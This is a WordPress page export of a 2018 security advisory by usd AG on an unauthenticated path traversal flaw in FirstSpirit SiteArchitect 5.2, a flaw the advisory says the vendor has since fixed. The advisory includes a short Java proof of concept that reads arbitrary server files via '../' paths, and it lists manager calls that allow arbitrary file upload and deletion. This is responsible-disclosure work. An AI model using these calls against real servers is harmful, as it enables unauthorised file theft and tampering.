{"id":16544,"date":"2021-07-07T12:50:25","date_gmt":"2021-07-07T10:50:25","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0006\/"},"modified":"2021-07-19T14:07:33","modified_gmt":"2021-07-19T12:07:33","slug":"usd-2018-0006","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0006\/","title":{"rendered":"usd-2018-0006"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0006 | FirstSpirit SiteArchitect\/5.2<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0006<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: FirstSpirit SiteArchitect<\/span><br \/><strong>Affected Version<\/strong><span>: 5.2<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Path Traversal<\/span><br \/><strong>Security Risk<\/strong><span>: Critical<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.e-spirit.com\/de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.e-spirit.com\/de\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed according to vendor in version 5.2.2109<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>The application is vulnerable to path traversal attacks. According to the proof of concept below an attacker is able to access any desired files which the web server has access to. This is possible without authentication. 
It is also possible to upload any file with any name to any location that the web server has access to.<\/p>\n<p>A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder by manipulating variables that reference files with \u201cdot-dot-slash (..\/)\u201d sequences and their variations or by using absolute file paths.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>Example case:<\/p>\n<p>ServerCaller caller = createCaller(\"\", port, mode, (String) null);<br \/>caller.connect();<br \/>ManagerInvocationHandler error = new ManagerInvocationHandler(caller, \"ModuleManager\");<br \/>ServerModuleManager moduleManager = (ServerModuleManager)java.lang.reflect.Proxy.newProxyInstance(ConnectionManager.class.getClassLoader(), new Class[]{ServerModuleManager.class}, error);<\/p>\n<p>ResourceFileInfo test = new ResourceFileInfo(\"..\/..\/..\/..\/download.txt\", 123, true);<br \/>InputStream in = moduleManager.getResourceFileContent(test);<br \/>FileOutputStream out = new FileOutputStream(\"c:\\\\pentest\\\\download.txt\");<br \/>IOUtils.copy(in, out);<\/p>\n<p>ManagerCallSignature:<br \/>manager=ModuleManager<br \/>method=getResourceFileContent<br \/>params=[class de.espirit.firstspirit.server.module.ResourceFileInfo] =&gt; The path of the parameter ResourceFileInfo is vulnerable to Directory-Traversal.<br \/>Any file which the web-server has access to can be read or downloaded without any<br \/>authentication.<\/p>\n<p>ManagerCallSignature:<br \/>manager=ServerManager<br \/>method=uploadUpdateFile<br \/>params=[class java.io.InputStream, class java.lang.String]}<br \/>=&gt; It\u2019s possible to put any file with any name in any location that the web-server<br \/>has access to.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=deleteExportFile<br \/>params=[interface 
de.espirit.firstspirit.access.export.ExportFile] =&gt; The filename of the parameter ExportFile is vulnerable to Directory-Traversal.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=downloadExportFile<br \/>params=[interface de.espirit.firstspirit.access.export.ExportFile] =&gt; The filename of the parameter ExportFile is vulnerable to Directory-Traversal.<\/p>\n<p>ManagerCallSignature:<br \/>manager=de.espirit.firstspirit.manager.ExportManager<br \/>method=uploadExportFile<br \/>params=[class java.lang.String, class java.io.InputStream] =&gt; The filename of the to-be-uploaded file is vulnerable to Directory-Traversal.<br \/>It\u2019s possible to put any file with any name in any location that the web-server<br \/>has access to.<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h3>Fix<\/h3>\n<p><span>User input for paths should be filtered and sanitized carefully. 
It is also recommended to isolate the file system of the application, e.g. with chroot jailing.<\/span><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-04-04 First contact request via info@e-spirit.com<\/li>\n<li>2018-04-24 Send vulnerabilities to vendor<\/li>\n<li>2018-05-15 Vendor releases a patch to fix the vulnerabilities<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was found by Sebastian Puttkammer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0006 | FirstSpirit SiteArchitect\/5.2 Advisory ID: usd-2018-0006 CVE Number: N\/A Affected Product: FirstSpirit SiteArchitect Affected Version: 5.2 Vulnerability Type: Path Traversal Security Risk: Critical Vendor URL: https:\/\/www.e-spirit.com\/de\/ Vendor Status: Fixed according to vendor in version 5.2.2109 Description The application is vulnerable to path traversal attacks. According to the proof of concept below an attacker is able to access any desired files which 
[&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16544","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16544"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16544\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}